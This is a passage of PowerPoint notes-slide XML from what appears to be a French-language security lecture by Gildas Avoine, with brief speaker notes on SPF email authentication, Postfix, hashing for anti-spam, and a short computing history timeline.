            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3368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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{648B68D8-1424-F14A-A6D7-08C6FC2C2E94}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324610" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5116512" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3246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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{310C2765-7C73-784D-96B8-408FD0428233}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334850" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5116512" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Require computation because a hash of the mail or part of the mail is computed.</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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D7C99D72-8963-B847-875E-96D7E11788EE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343042" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5116512" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3430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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F10D653-3165-484F-A8DF-83ABD6D6D5B1}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345090" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5116512" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34509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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{66513EDE-7BFF-1846-8FEE-0202820DD3DE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316418" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3838575"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4862513"/>
            <a:ext cx="5680075" cy="4603750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SPF: on indique dans son DNS quel serveur est autorisé à envoyer des mails avec un serveur address (enveloppe) dans le domaine. Autrement dit, le serveur qui reçoit un mail de toto@titi.com depuis la machine aaa.bbb.ccc.ddd vérifie que cette machine est autorisée à envoyer des mails pour titi.com.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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1854D04F-62E8-0B45-8FC3-C8E28063FE3E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361474" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3838575"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4862513"/>
            <a:ext cx="5680075" cy="4603750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Postfix = serveur de mails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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D1FD718D-392C-E34C-BA16-E3186278DB6B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324610" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324611" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EDF4AA9A-DA95-C64E-B680-51F7102CDAFC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275458" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3838575"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4862513"/>
            <a:ext cx="5680075" cy="4603750"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB4E286D-15C6-0749-9A0E-12E85DA07F66}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326658" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326659" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Apple: 1976</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Premier PC (DOS): 1981</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Windows: 1985</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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2AEA6548-3261-884D-8F0A-D6D64CD65604}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332802" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332803" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3EC8AE1A-D9A9-3346-A093-5D836AFD730F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328706" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328707" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>stealth = furtif</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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5D4D4C65-DB8A-6141-9F52-8BE5E21F7224}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330754" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330755" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>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t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B4718CD6-CB53-F44B-BA2B-E90F3DD02AE5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183298" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5116512" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1832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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{639B3A21-3215-9442-B22C-09692FEF8DA4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340994" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340995" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B39069B7-7982-774B-BABE-BF6BBB2780A6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343042" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
